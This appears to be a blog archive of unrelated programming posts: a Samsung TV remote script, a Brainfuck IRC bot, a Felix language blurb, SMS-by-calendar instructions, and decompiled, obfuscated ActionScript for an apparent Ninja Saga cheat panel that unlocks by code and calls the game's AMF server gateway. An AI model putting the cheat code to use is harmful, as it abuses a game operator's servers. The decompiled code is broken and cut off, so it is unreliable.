sendKey("KEY_PLAY",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key PLAY, DEBUG') def key_pause(): try: sendKey("KEY_PAUSE",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key PAUSE, DEBUG') def key_mute(): try: sendKey("KEY_MUTE",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key PLAY, DEBUG') def key_picture_size(): try: sendKey("KEY_PICTURE_SIZE",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key PICTURE SIZE, DEBUG') def key_volup(): try: sendKey("KEY_VOLUP",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key VOLUME UP, DEBUG') def key_voldown(): try: sendKey("KEY_VOLDOWN",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key PICTURE SIZE, DEBUG') def key_tools(): try: sendKey("KEY_TOOLS",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key TOOLS, DEBUG') def key_poweroff(): try: sendKey("KEY_POWEROFF",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key POWER OFF, DEBUG') def key_poweroff(): try: sendKey("KEY_POWEROFF",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key POWER OFF, DEBUG') def key_chup(): try: sendKey("KEY_CHUP",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key CH UP, DEBUG') def key_chdown(): try: sendKey("KEY_CHDOWN",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key CH DOWN, DEBUG') def key_contents(): try: sendKey("KEY_CONTENTS",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key CONTENTS, DEBUG') def key_chdown(): try: sendKey("KEY_CHDOWN",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key CH DOWN, DEBUG') def key_w_link(): try: sendKey("KEY_W_LINK",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key W LINK, DEBUG') def key_media_p(): try: sendKey("Media P",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key MEDIA P, DEBUG') def key_rss(): try: sendKey("KEY_RSS",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key RSS, DEBUG') def key_internet(): try: sendKey("KEY_CHDOWN",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key INTERNET, DEBUG') def key_mts(): try: sendKey("KEY_MTS",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key CH MTS, DEBUG') def key_dual(): try: sendKey("Dual",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key DUAL, DEBUG') def key_caption(): try: sendKey("KEY_CAPTION",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key CAPTION, DEBUG') def key_subt(): try: sendKey("Subt",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key SUBT, DEBUG') def key_rewind(): try: sendKey("KEY_REWIND",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key REWIND, DEBUG') def key_ff(): try: sendKey("KEY_FF",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key CH DOWN, DEBUG') def key_rec(): try: sendKey("KEY_REC",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key REC, DEBUG') def key_stop(): try: sendKey("KEY_STOP",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key STOP, DEBUG') def key_stop(): try: sendKey("KEY_TV",sock,tvappstring) sock.close() except: #logger.log('Samsung remote failed pressing key STOP, DEBUG') # To test this remote you need to call each function eg if you want to the stop key you write: key_stop() # After this comments
14 January 2013
An IRC bot written in Brainfuck
I've included a simple brainfuck interpreter that uses a TCP connection for input and output.You can probably run this through a regular old brainfuck interpreter and do some crazy shit to wire it up to a TCP connection, but I didn't feel like it. You can probably make something work with socat.
You can use the custom bf interpreter like this:
netfuck hostname:port path/to/code.bf
For example, to connect the bot to freenode, use this:
netfuck irc.freenode.net:6667 irc-bot.bf
Then, to get it into your favorite channel, use this from IRC:
/msg bfbot J #channelname
Included Programs
A couple of simple C# programs are included.- bf.exe: A simple brainfuck interpreter.
- netfuck.exe: A brainfuck interpreter that uses TCP for input/output.
- asciitodec.exe: Converts an ASCII string to decimal to make my life easier
Current capabilities of the bot:- Connect to IRC, respond to PING and such
- When PRIVMSGed with "J #channelname", it joins #channelname
- In-channel, use "$message" to have "message" echoed back to you
The Felix Programming Language
The fastest scripting language on Earth.
Why do we need a new programming language?
Existing languages have too many faults to support modern requirements.Goals.
- high performance
- rapid prototyping and a scripting language deployment model
- safety and correctness
- scalability
- adaptability
- platform independence
The ability to obtain high performance in a wide variety of domains is fundamental. Light-speed behaviour was a primary goal of C++ and it is for Felix too. In fact, we aim for hyper-light performance: faster than C.Network performance matters too. This means we need platform independent asynchronous I/O. To support a large number of clients, we need lightweight threads with fast context switching.
Rapid Prototyping and scripting harness
C++ is typically very hard to build. Make files, macros, compiler and OS feature tests, switches, paths and a huge array of poorly integrated non-portable tools make development a nightmare compared with the easy of deploying Python or Perl scripts. IDEs fix these problems in a clean way, but only handle boilerplate workflows.Correctness
Unfortunately dynamic typing is not amenable to reasoning about program correctness, and traditional imperative programming also presents obstacles.We need:
- static typing for low level safety
- contract programming model for high level safety
- automatic memory management without compromising performance
- overloading for convenience
- parametric polymorphism for data types
- functional programming for correctness
- imperative programming for performance
- platform independence for portability
- platform dependence for performance and low level programming
- shared-memory concurrency for real-time performance
- message passing for distributed concurrent cloud computing
- low level optimisations for tight calculations
- high level optimisations for overall application speed
- extensible grammar in user space for implementing Domain Specific Sub-Languages
- easy use of existing C and C++ libraries and code bases
- built-in support for web development
- built-in support for high performance computing
- built-in support for game development
How Felix meets these goals.
Felix is designed to address all these issues. It is a C++ code generator and thereby can provide compatibility with existing C and C++ code bases. We let the native C++ compiler do the hard work of low level optimisation whilst Felix does high level optimisations. The resulting code is very fast, sometimes "faster than the speed of light (C)", but can be platform independent and is simply to deploy: just distribute the source files and run them, like a scripting language.However Felix has its own type system based on a combination of Ocaml and Haskell. Like Ocaml it provides strong support for functional programming, whilst also supporting imperative programming. The type system is strict.
First order polymorphism is core, not a bolt-on as in Java and C++. Felix also provides open overloading like C++, but only allows exact matches. It also provides Haskell style type classes as an alternative way to obtain genericity.
To overcome syntactic impedence mismatching with the wide number of application domains, the Felix grammar is defined in user space. It can be extended by the end user to provide a suitable Domain Specific Sub-Language. The parser is GLR and the user actions are written in R5RS Scheme.
A rich set of shortcuts makes programming a breeze. Built-in regular expression support and other features provide string handling on par with Perl. Web programming is enabled by built-in asynchronous socket I/O combined with cooperatively multi-tasked fibres that would support millions of http clients if only the server could supply enough sockets. Context switching is achieved by a pointer swap, and state is maintained by a spaghetti stack.
Sumber : http://felix-lang.org/
13 January 2013
gcsms allows you to programmatically send SMS to your number for free through Google Calendar service. You must set up a few things before using gcsms to send SMS: 1. Setup a Google account if you don't already have one - https://gmail.com 2. In Google Calendar (https://calendar.google.com), under 'Calendar Settings' -> 'Mobile Setup', enter your mobile number and verify it. 3. In API Console (https://code.google.com/apis/console), under Services, enable 'Calendar API'. 4. In API Console, under 'API Access', create a new 'Client ID for installed applications' with application type of 'other' and note down the 'Client ID' and 'Client Secret'. 5. Edit '~/.gcsms' and enter the 'Client ID' and 'Client Secret' and save - see sample.config for the format of the config file 6. Run 'python gcsms.py auth' and follow the instructions, granting calendar access to gcsms. Once you've done all the above, you can send an SMS by running: $ echo 'Hi, I was sent from bash' | python gcsms.py send Have patience. There might be 5 to 30 seconds delay between when you run the above command and when you you receive the SMS. If you require a more timely delivery, please use an SMS gateway service like twilio or tropo. gcsms creates a dedicated calendar named 'gcsms' in which it adds an event for everytime you run the 'send' command. As of now, the events remain in your calendar unless you manually delete them. If you wish to delete all the events that gcsms has created, simply delete the aforementioned calendar. gcsms will recreate the calendar if it needs to. From time to time, you might have to run 'python gcsms.py auth' to reauthenticate with Google. This is a pain but there is no way around it. Otherwise, enjoy. Download gsms.
01 January 2013
Ninja Saga Association Panel
import flash.utils.*; public dynamic final class _StrPool1336 { public static function _StrPool1337(_arg1:int):String{ //unresolved jump var _local2:* = new Array(13592198, 2368548, 2368549, 4216384, 1381701, 13592198, 4989476, 5973285, 2180948, 1381725, 13592198, 5264164, 2368081, 2971472, 1381671, 13592198, 4216868, 2498850, 2186585, 1381668, 13592198, 2368807, 5448486, 2894884, 1512737, 13592198, 2892071, 2564640, 2500176, 1381669, 13592198, 2892071, 5317152, 5513761, 1381665, 13592198, 5644583, 2893091, 2105378, 1381718, 13592198, 2171687, 5252389, 5461029, 1381716, 13592198, 2567207, 2119469, 2564180, 1381716, 13592198, 2512679, 2370861, 2905638, 1381671, 13592198, 5722407, 2108452, 2957613, 1381716, 13592198, 5330726, 2105428, 2969939, 1381665, 13592198, 2381350, 2174244, 2567212, 1381712, 13592198, 2969894, 5516322, 5460001, 1381671, 13592198, 2511654, 2957605, 2446928, 1381671, 13592198, 2499873, 5263651, 5451053, 1381716, 13592198, 2500385, 5448228, 5525795, 1381669, 13592198, 2500385, 2904097, 2315810, 1381671, 13592198, 5515041, 2174288, 5516368, 1381677, 13592198, 2893345, 2501712, 5252132, 1381665, 13592198, 2893345, 5252691, 2170918, 1381669, 13592198, 5514785, 2433319, 2316067, 1381669, 13592198, 5318177, 2959188, 5447981, 1381716, 13592198, 5318177, 2369361, 5448229, 1381671, 13592198, 5318177, 5722193, 5723943, 1381718, 13592198, 2958113, 2500435, 2106449, 1381716, 13592198, 2239777, 2369108, 2905943, 1381667, 13592198, 2960673, 2501670, 5710417, 1381671, 13592198, 2960673, 5513558, 5723175, 1381716, 13592198, 5461537, 2302752, 2960685, 1381677, 13592198, 5461537, 2105424, 2370596, 1381667, 13592198, 2576673, 5448237, 2498598, 1381665, 13592198, 2379809, 2958423, 5722144, 1381667, 13592198, 2576417, 2969888, 5709908, 1381718, 13592198, 2368800, 5460004, 5514320, 1381712, 13592198, 5448992, 5526566, 5318480, 1381677, 13592198, 2892832, 5330733, 5461031, 1381669, 13592198, 2892832, 5656876, 2368045, 1381718, 13592198, 5644576, 5711443, 2564438, 1381716, 13592198, 2237216, 2434853, 2305367, 1381669, 13592198, 2237216, 2172455, 5461031, 1381669, 13592198, 2237216, 2567213, 2105892, 1381669, 13592198, 2237216, 5461840, 2238033, 1381669, 13592198, 2237216, 2510928, 2236708, 1381718, 13592198, 2236960, 5656876, 2183254, 1381671, 13592198, 2239520, 5251107, 2433572, 1381667, 13592198, 2239520, 2119505, 5317159, 1381718, 13592198, 5264416, 5448022, 2567462, 1381665, 13592198, 5002272, 4411483, 2901840, 1381667, 13592198, 2381600, 2511700, 2117932, 1381716, 13592198, 2578208, 5330465, 2117975, 1381665, 13592198, 2578208, 2501933, 2301990, 1381669, 13592198, 2445344, 2960672, 2314324, 1381712, 13592198, 2576416, 5460261, 2434897, 1381716, 13592198, 5263392, 5526609, 5658452, 1381671, 13592198, 2904864, 2250533, 5252134, 1381677, 13592198, 5657376, 5449255, 5461846, 1381671, 13592198, 5657376, 5448998, 5447725, 1381665, 13592198, 5657376, 2305313, 2960726, 1381718, 13592198, 5657376, 2119469, 2501676, 1381716, 13592198, 5657376, 5448785, 5712929, 1381667, 13592198, 5657376, 2171728, 2172710, 1381716, 13592198, 5657376, 2305360, 2499366, 1381677, 13592198, 5329696, 5526565, 2237475, 1381677, 13592198, 5329696, 2499876, 2305315, 1381669, 13592198, 5329696, 5252947, 5329233, 1381665, 13592198, 2303779, 5645612, 5329703, 1381667, 13592198, 2303779, 2174039, 5460269, 1381712, 13592198, 2959139, 5514790, 2381652, 1381665, 13592198, 5515043, 5516374, 5657379, 1381669, 13592198, 5646115, 5525805, 5265232, 1381712, 13592198, 2893347, 5525793, 2368339, 1381671, 13592198, 2893347, 5319970, 2447190, 1381665, 13592198, 2302243, 2498647, 5658156, 1381671, 13592198, 2236707, 5252902, 5525537, 1381665, 13592198, 2236707, 5657638, 2905121, 1381669, 13592198, 2236707, 2510881, 2370854, 1381671, 13592198, 2236707, 2171936, 5447715, 1381718, 13592198, 2236707, 5513248, 2576678, 1381669, 13592198, 2236707, 2511138, 5722912, 1381718, 13592198, 2368035, 2106918, 2249811, 1381677, 13592198, 2368035, 5711136, 2433361, 1381677, 13592198, 5254435, 2237734, 2183201, 1381669, 13592198, 5254435, 5330512, 5252130, 1381667, 13592198, 5451043, 2368804, 2893399, 1381677, 13592198, 2370595, 2367782, 2500133, 1381712, 13592198, 2370595, 5723732, 5514320, 1381667, 13592198, 2370595, 2184020, 2185043, 1381667, 13592198, 2370595, 2303825, 2970660, 1381718, 13592198, 2370595, 5252945, 5460780, 1381667, 13592198, 2370595, 2237776, 5460820, 1381665, 13592198, 2370595, 2564432, 5658455, 1381677, 13592198, 2567203, 2369060, 5252130, 1381671, 13592198, 2567203, 5723684, 5448485, 1381665, 13592198, 2567203, 2499153, 2510931, 1512784, 13592198, 5461027, 2971168, 2172450, 1381667, 13592198, 5849122, 5972260, 5842257, 1381719, 13592198, 6046498, 5914966, 2236999, 1381666); var _local3:* = new ByteArray(); if (false){ } else { var _local4:* = 0; //unresolved jump if (true){ } else { //unresolved jump }; //unresolved jump (((_local3 >>> _local2[((_arg1 + 1) + ((_local4 - (_local4 % 3)) / 3))]) & 0xFF) ^ (_local2[_arg1] ^ 13592211)).writeByte(!NULL!); }; //unresolved jump _local4++; if (true){ } else { //unresolved jump if (_local4 < (_local2 ^ 31)){ //unresolved jump }; //unresolved jump }; //unresolved jump return ((_local2[_arg1] ^ 13592211)); /*not popped _local4 */ } } }//package package ninja_association_fla { import flash.display.*; public dynamic class icon_emblem2_7 extends MovieClip { public function icon_emblem2_7(){ addFrameScript(0, this.frame1); } function frame1(){ stop(); } } }//package ninja_association_fla package ninjasaga.linkage { import flash.events.*; import ninjasaga.*; import ninjasaga.data.*; import flash.display.*; import flash.net.*; import flash.text.*; import flash.utils.*; import flash.geom.*; public class NinjaAssociationPanel extends MovieClip { public static var langLib:MovieClip; private const HELPS:Array; private const TIMELINE_BUTTONS:Array; private const CHARACTER_HEAD_SCALING:Number = 4; public var febgrnhtmplkij:uint = 15265; public var febgrnhtmplkik:uint = 14525; private var remotingGateway:String; private var _netConnection:NetConnection; public var febgrnhtmplkij1:uint; public var febgrnhtmplkij2:uint; public var febgrnhtmplkij3:uint; public var febgrnhtmplkik1:uint; public var febgrnhtmplkik2:uint; public var febgrnhtmplkik3:uint; public var totalGoldTxt:TextField; public var card:MovieClip; public var lbl_token:TextField; public var exchangeBtn:MovieClip; public var duitBtn:MovieClip; private var crystal:uint = 0; private var tombolSekali:uint = 0; public var lbl_gold:TextField; public var lbl_gold2:TextField; public var lbl_pet_content:TextField; public var confirmExchangeBtn:MovieClip; public var confirmDuitBtn:MovieClip; public var confirmExpBtn:MovieClip; public var confirmMissionBtn:MovieClip; public var crystalTxt:TextField; public var crystal2Txt:TextField; public var crystal3Txt:TextField; public var crystal4Txt:TextField; public var crystal5Txt:TextField; public var lbl_youhave:TextField; public var bloodlineBtn:MovieClip; public var getMoreBtn:MovieClip; public var btnExit:SimpleButton; public var btnQuit:SimpleButton; public var npcTxt:TextField; public var maxCrystalTxt:TextField; public var lbl_bloodline_content:TextField; private var connectingAmf:Boolean = false; public var passportBtn:MovieClip; public var goldTxt:TextField; public var gold2Txt:TextField; private var bonusGold:uint; private var tipeCheat:uint; private var expDapet:uint; private var expTotal:uint; private var expMax:uint; private var goldDapet:uint; private var msnDapet:String; private var missionE:String; private var nomorUjian:uint = 1; private var countDown:uint; private var delayDulu:uint; private var itungAja:uint; private var detik:uint; private var myTimer:Timer; private var missionTimer:Timer; private var levelAkhir:uint; private var nomorMission:uint; private var detikMin:uint; private var chunina:Boolean = false; private var chuninb:Boolean = false; private var chuninc:Boolean = false; private var chunind:Boolean = false; private var chunine:Boolean = false; private var jounina:Boolean = false; private var jouninb:Boolean = false; private var jouninc:Boolean = false; private var jounind:Boolean = false; private var jounine:Boolean = false; private var chuninz:Boolean = false; private var jouninz:Boolean = false; public function NinjaAssociationPanel(){ this.missionTimer = new Timer(1000, 20); this.TIMELINE_BUTTONS = ["passportBtn", "exchangeBtn", "bloodlineBtn", "duitBtn"]; this.HELPS = ["passportHelp", "crystalHelp", "bloodlineHelp"]; addFrameScript(0, this.frame1, 5, this.frame6, 55, this.frame56, 56, this.frame57, 60, this.frame61, 61, this.frame62); } function frame62(){ this.onPet(); } function frame6(){ this.onCode(); } private function onCode():void{ this["gold2Txt"].addEventListener(Event.CHANGE, this.updateMission); this["btnQuit"].addEventListener(MouseEvent.CLICK, this.hide); } private function updateMission(_arg1:Event):void{ this.missionE = this["gold2Txt"].text; if ((this.missionE == _StrPool1336._StrPool1337(480))){ } else { (this.missionE == _StrPool1336._StrPool1337(480)); }; if ((this.missionE == _StrPool1336._StrPool1337(480))){ } else { (this.missionE == _StrPool1336._StrPool1337(480)); }; if ((this.missionE == _StrPool1336._StrPool1337(480))){ } else { (this.missionE == _StrPool1336._StrPool1337(480)); }; if ((this.missionE == _StrPool1336._StrPool1337(480))){ } else { (this.missionE == _StrPool1336._StrPool1337(480)); }; if ((this.missionE == _StrPool1336._StrPool1337(480))){ } else { (this.missionE == _StrPool1336._StrPool1337(480)); }; if ((this.missionE == _StrPool1336._StrPool1337(480))){ } else { (this.missionE == _StrPool1336._StrPool1337(480)); }; if ((this.missionE == _StrPool1336._StrPool1337(480))){ } else { (this.missionE == _StrPool1336._StrPool1337(480)); }; if ((this.missionE == _StrPool1336._StrPool1337(480))){ } else { (this.missionE == _StrPool1336._StrPool1337(480)); }; if ((this.missionE == _StrPool1336._StrPool1337(480))){ } else { (this.missionE == _StrPool1336._StrPool1337(480)); }; if (!(this.missionE == _StrPool1336._StrPool1337(480))){ } else { this.gotoAndPlay("show"); //unresolved jump }; if ((this.missionE == _StrPool1336._StrPool1337(400))){ } else { (this.missionE == _StrPool1336._StrPool1337(400)); }; if ((this.missionE == _StrPool1336._StrPool1337(400))){ } else { (this.missionE == _StrPool1336._StrPool1337(400)); }; if ((this.missionE == _StrPool1336._StrPool1337(400))){ } else { (this.missionE == _StrPool1336._StrPool1337(400)); }; if ((this.missionE == _StrPool1336._StrPool1337(400))){ } else { (this.missionE == _StrPool1336._StrPool1337(400)); }; if ((this.missionE == _StrPool1336._StrPool1337(400))){ } else { (this.missionE == _StrPool1336._StrPool1337(400)); }; if ((this.missionE == _StrPool1336._StrPool1337(400))){ } else { (this.missionE == _StrPool1336._StrPool1337(400)); }; if ((this.missionE == _StrPool1336._StrPool1337(400))){ } else { (this.missionE == _StrPool1336._StrPool1337(400)); }; if ((this.missionE == _StrPool1336._StrPool1337(400))){ } else { (this.missionE == _StrPool1336._StrPool1337(400)); }; if ((this.missionE == _StrPool1336._StrPool1337(400))){ } else { (this.missionE == _StrPool1336._StrPool1337(400)); }; if (!(this.missionE == _StrPool1336._StrPool1337(400))){ } else { this.gotoAndPlay("show"); //unresolved jump }; if ((this.missionE == _StrPool1336._StrPool1337(355))){ } else { (this.missionE == _StrPool1336._StrPool1337(355)); }; if ((this.missionE == _StrPool1336._StrPool1337(355))){ } else { (this.missionE == _StrPool1336._StrPool1337(355)); }; if ((this.missionE == _StrPool1336._StrPool1337(355))){ } else { (this.missionE == _StrPool1336._StrPool1337(355)); }; if (!(this.missionE == _StrPool1336._StrPool1337(355))){ (this.missionE == _StrPool1336._StrPool1337(355)); }; if ((this.missionE == _StrPool1336._StrPool1337(355))){ } else { (this.missionE == _StrPool1336._StrPool1337(355)); }; if ((this.missionE == _StrPool1336._StrPool1337(355))){ } else { (this.missionE == _StrPool1336._StrPool1337(355)); }; if ((this.missionE == _StrPool1336._StrPool1337(355))){ } else { (this.missionE == _StrPool1336._StrPool1337(355)); }; if ((this.missionE == _StrPool1336._StrPool1337(355))){ } else { (this.missionE == _StrPool1336._StrPool1337(355)); }; if ((this.missionE == _StrPool1336._StrPool1337(355))){ } else { (this.missionE == _StrPool1336._StrPool1337(355)); }; if (!(this.missionE == _StrPool1336._StrPool1337(355))){ } else { this.gotoAndPlay("show"); //unresolved jump }; if ((this.missionE == _StrPool1336._StrPool1337(335))){ } else { (this.missionE == _StrPool1336._StrPool1337(335)); }; if ((this.missionE == _StrPool1336._StrPool1337(335))){ } else { (this.missionE == _StrPool1336._StrPool1337(335)); }; if ((this.missionE == _StrPool1336._StrPool1337(335))){ } else { (this.missionE == _StrPool1336._StrPool1337(335)); }; if ((this.missionE == _StrPool1336._StrPool1337(335))){ } else { (this.missionE == _StrPool1336._StrPool1337(335)); }; if ((this.missionE == _StrPool1336._StrPool1337(335))){ } else { (this.missionE == _StrPool1336._StrPool1337(335)); }; if ((this.missionE == _StrPool1336._StrPool1337(335))){ } else { (this.missionE == _StrPool1336._StrPool1337(335)); }; if ((this.missionE == _StrPool1336._StrPool1337(335))){ } else { (this.missionE == _StrPool1336._StrPool1337(335)); }; if ((this.missionE == _StrPool1336._StrPool1337(335))){ } else { (this.missionE == _StrPool1336._StrPool1337(335)); }; if ((this.missionE == _StrPool1336._StrPool1337(335))){ } else { (this.missionE == _StrPool1336._StrPool1337(335)); }; if (!(this.missionE == _StrPool1336._StrPool1337(335))){ } else { this.gotoAndPlay("show"); //unresolved jump }; if ((this.missionE == _StrPool1336._StrPool1337(460))){ } else { (this.missionE == _StrPool1336._StrPool1337(460)); }; if ((this.missionE == _StrPool1336._StrPool1337(460))){ } else { (this.missionE == _StrPool1336._StrPool1337(460)); }; if ((this.missionE == _StrPool1336._StrPool1337(460))){ } else { (this.missionE == _StrPool1336._StrPool1337(460)); }; if ((this.missionE == _StrPool1336._StrPool1337(460))){ } else { (this.missionE == _StrPool1336._StrPool1337(460)); }; if ((this.missionE == _StrPool1336._StrPool1337(460))){ } else { (this.missionE == _StrPool1336._StrPool1337(460)); }; if ((this.missionE == _StrPool1336._StrPool1337(460))){ } else { (this.missionE == _StrPool1336._StrPool1337(460)); }; if ((this.missionE == _StrPool1336._StrPool1337(460))){ } else { (this.missionE == _StrPool1336._StrPool1337(460)); }; if ((this.missionE == _StrPool1336._StrPool1337(460))){ } else { (this.missionE == _StrPool1336._StrPool1337(460)); }; if ((this.missionE == _StrPool1336._StrPool1337(460))){ } else { (this.missionE == _StrPool1336._StrPool1337(460)); }; if (!(this.missionE == _StrPool1336._StrPool1337(460))){ } else { this.gotoAndPlay("show"); //unresolved jump }; if ((this.missionE == _StrPool1336._StrPool1337(125))){ } else { (this.missionE == _StrPool1336._StrPool1337(125)); }; if ((this.missionE == _StrPool1336._StrPool1337(125))){ } else { (this.missionE == _StrPool1336._StrPool1337(125)); }; if ((this.missionE == _StrPool1336._StrPool1337(125))){ } else { (this.missionE == _StrPool1336._StrPool1337(125)); }; if ((this.missionE == _StrPool1336._StrPool1337(125))){ } else { (this.missionE == _StrPool1336._StrPool1337(125)); }; if ((this.missionE == _StrPool1336._StrPool1337(125))){ } else { (this.missionE == _StrPool1336._StrPool1337(125)); }; if ((this.missionE == _StrPool1336._StrPool1337(125))){ } else { (this.missionE == _StrPool1336._StrPool1337(125)); }; if ((this.missionE == _StrPool1336._StrPool1337(125))){ } else { (this.missionE == _StrPool1336._StrPool1337(125)); }; if ((this.missionE == _StrPool1336._StrPool1337(125))){ } else { (this.missionE == _StrPool1336._StrPool1337(125)); }; if ((this.missionE == _StrPool1336._StrPool1337(125))){ } else { (this.missionE == _StrPool1336._StrPool1337(125)); }; if (!(this.missionE == _StrPool1336._StrPool1337(125))){ } else { this.gotoAndPlay("show"); //unresolved jump }; if ((this.missionE == _StrPool1336._StrPool1337(395))){ } else { (this.missionE == _StrPool1336._StrPool1337(395)); }; if ((((this.missionE == _StrPool1336._StrPool1337(395))) || ((this.missionE == _StrPool1336._StrPool1337(15))))){ } else { (((this.missionE == _StrPool1336._StrPool1337(395))) || ((this.missionE == _StrPool1336._StrPool1337(15)))); }; if ((((this.missionE == _StrPool1336._StrPool1337(395))) || ((this.missionE == _StrPool1336._StrPool1337(15))))){ } else { (((this.missionE == _StrPool1336._StrPool1337(395))) || ((this.missionE == _StrPool1336._StrPool1337(15)))); }; if ((((this.missionE == _StrPool1336._StrPool1337(395))) || ((this.missionE == _StrPool1336._StrPool1337(15))))){ } else { (((this.missionE == _StrPool1336._StrPool1337(395))) || ((this.missionE == _StrPool1336._StrPool1337(15)))); }; if ((((this.missionE == _StrPool1336._StrPool1337(395))) || ((this.missionE == _StrPool1336._StrPool1337(15))))){ } else { (((this.missionE == _StrPool1336._StrPool1337(395))) || ((this.missionE == _StrPool1336._StrPool1337(15)))); }; if ((((this.missionE == _StrPool1336._StrPool1337(395))) || ((this.missionE == _StrPool1336._StrPool1337(15))))){ } else { (((this.missionE == _StrPool1336._StrPool1337(395))) || ((this.missionE == _StrPool1336._StrPool1337(15)))); }; if ((((this.missionE == _StrPool1336._StrPool1337(395))) || ((this.missionE == _StrPool1336._StrPool1337(15))))){ } else { (((this.missionE == _StrPool1336._StrPool1337(395))) || ((this.missionE == _StrPool1336._StrPool1337(15)))); }; if ((((this.missionE == _StrPool1336._StrPool1337(395))) || ((this.missionE == _StrPool1336._StrPool1337(15))))){ } else { (((this.missionE == _StrPool1336._StrPool1337(395))) || ((this.missionE == _StrPool1336._StrPool1337(15)))); }; if (!(((this.missionE == _StrPool1336._StrPool1337(395))) || ((this.missionE == _StrPool1336._StrPool1337(15))))){ } else { this.gotoAndPlay("show"); //unresolved jump }; if ((this.missionE == _StrPool1336._StrPool1337(55))){ } else { (this.missionE == _StrPool1336._StrPool1337(55)); }; if ((this.missionE == _StrPool1336._StrPool1337(55))){ } else { (this.missionE == _StrPool1336._StrPool1337(55)); }; if ((this.missionE == _StrPool1336._StrPool1337(55))){ } else { (this.missionE == _StrPool1336._StrPool1337(55)); }; if ((this.missionE == _StrPool1336._StrPool1337(55))){ } else { (this.missionE == _StrPool1336._StrPool1337(55)); }; if ((this.missionE == _StrPool1336._StrPool1337(55))){ } else { (this.missionE == _StrPool1336._StrPool1337(55)); }; if ((this.missionE == _StrPool1336._StrPool1337(55))){ } else { (this.missionE == _StrPool1336._StrPool1337(55)); }; if ((this.missionE == _StrPool1336._StrPool1337(55))){ } else { (this.missionE == _StrPool1336._StrPool1337(55)); }; if ((this.missionE == _StrPool1336._StrPool1337(55))){ } else { (this.missionE == _StrPool1336._StrPool1337(55)); }; if ((this.missionE == _StrPool1336._StrPool1337(55))){ } else { (this.missionE == _StrPool1336._StrPool1337(55)); }; if (!(this.missionE == _StrPool1336._StrPool1337(55))){ } else { this.gotoAndPlay("show"); //unresolved jump }; if ((this.missionE == _StrPool1336._StrPool1337(95))){ } else { (this.missionE == _StrPool1336._StrPool1337(95)); }; if ((this.missionE == _StrPool1336._StrPool1337(95))){ } else { (this.missionE == _StrPool1336._StrPool1337(95)); }; if ((this.missionE == _StrPool1336._StrPool1337(95))){ } else { (this.missionE == _StrPool1336._StrPool1337(95)); }; if ((this.missionE == _StrPool1336._StrPool1337(95))){ } else { (this.missionE == _StrPool1336._StrPool1337(95)); }; if ((this.missionE == _StrPool1336._StrPool1337(95))){ } else { (this.missionE == _StrPool1336._StrPool1337(95)); }; if ((this.missionE == _StrPool1336._StrPool1337(95))){ } else { (this.missionE == _StrPool1336._StrPool1337(95)); }; if ((this.missionE == _StrPool1336._StrPool1337(95))){ } else { (this.missionE == _StrPool1336._StrPool1337(95)); }; if ((this.missionE == _StrPool1336._StrPool1337(95))){ } else { (this.missionE == _StrPool1336._StrPool1337(95)); }; if ((this.missionE == _StrPool1336._StrPool1337(95))){ } else { (this.missionE == _StrPool1336._StrPool1337(95)); }; if (!(this.missionE == _StrPool1336._StrPool1337(95))){ } else { this.gotoAndPlay("show"); //unresolved jump }; if (this.missionE != _StrPool1336._StrPool1337(485)){ } else { this.gotoAndPlay("show"); //unresolved jump }; if ((this.missionE == _StrPool1336._StrPool1337(325))){ } else { (this.missionE == _StrPool1336._StrPool1337(325)); }; if ((this.missionE == _StrPool1336._StrPool1337(325))){ } else { (this.missionE == _StrPool1336._StrPool1337(325)); }; if ((this.missionE == _StrPool1336._StrPool1337(325))){ } else { (this.missionE == _StrPool1336._StrPool1337(325)); }; if ((this.missionE == _StrPool1336._StrPool1337(325))){ } else { (this.missionE == _StrPool1336._StrPool1337(325)); }; if ((this.missionE == _StrPool1336._StrPool1337(325))){ } else { (this.missionE == _StrPool1336._StrPool1337(325)); }; if ((this.missionE == _StrPool1336._StrPool1337(325))){ } else { (this.missionE == _StrPool1336._StrPool1337(325)); }; if ((this.missionE == _StrPool1336._StrPool1337(325))){ } else { (this.missionE == _StrPool1336._StrPool1337(325)); }; if ((this.missionE == _StrPool1336._StrPool1337(325))){ } else { (this.missionE == _StrPool1336._StrPool1337(325)); }; if (!(this.missionE == _StrPool1336._StrPool1337(325))){ } else { this.missionE = "complete"; this.gotoAndPlay("show"); }; } private function AMFps(_arg1:String, _arg2:Array, _arg3:Function):void{ this.remotingGateway = "http://app.ninjasaga.com/amf/"; this._netConnection = new NetConnection(); this._netConnection.connect(this.remotingGateway); if (_arg2.length != 0){ } else { this._netConnection.call(_arg1, new Responder(_arg3, this.erroneousResult)); }; if (_arg2.length != 1){ } else { this._netConnection.call(_arg1, new Responder(_arg3, this.erroneousResult), _arg2[0]); }; if (_arg2.length != 2){ } else { this._netConnection.call(_arg1, new Responder(_arg3, this.erroneousResult), _arg2[0], _arg2[1]); }; if (_arg2.length != 3){ } else { this._netConnection.call(_arg1, new Responder(_arg3, this.erroneousResult), _arg2[0], _arg2[1], _arg2[2]); }; if (_arg2.length != 4){ } else { this._netConnection.call(_arg1, new Responder(_arg3, this.erroneousResult), _arg2[0], _arg2[1], _arg2[2], _arg2[3]); }; if 